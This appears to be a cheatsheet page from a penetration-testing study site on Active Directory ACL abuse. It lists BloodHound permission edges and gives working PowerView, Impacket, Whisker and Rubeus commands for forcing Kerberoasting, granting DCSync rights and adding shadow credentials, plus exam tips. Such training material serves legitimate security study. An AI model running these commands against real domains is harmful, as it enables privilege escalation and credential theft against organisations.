ACL Abuse
Active Directory
Overview
Exploiting misconfigured Active Directory Access Control Lists.
0
Exercises
0
Flashcards
1
Mind Maps
Cheatsheet
BloodHound ACL Edges
- GenericAll: Full control
- GenericWrite: Modify attributes
- WriteOwner: Change owner
- WriteDacl: Modify permissions
- ForceChangePassword: Reset password
Abuse GenericAll on User
# Set SPN for Kerberoasting
Set-DomainObject -Identity victim -Set @{serviceprincipalname='fake/YOURPC'} # Abuse GenericAll to set SPN
GetUserSPNs.py domain/attacker -dc-ip DC # Kerberoast the modified accountAbuse WriteDacl
# Grant yourself DCSync rights Add-DomainObjectAcl -TargetIdentity 'DC=domain,DC=local' -PrincipalIdentity attacker -Rights DCSync # Abuse WriteDacl to grant DCSync
Shadow Credentials
Whisker.exe add /target:victim # Add shadow credential Rubeus.exe asktgt /user:victim /certificate:cert.pfx /password:pass # Auth with shadow cert
Command Examples
Common Pitfalls
- Not running BloodHound collection
- Missing indirect attack paths
- Forgetting to clean up changes
Exam Survival Tips
- BloodHound is essential for ACL discovery
- Check 'Shortest Path to Domain Admin'
- Look for GenericAll on groups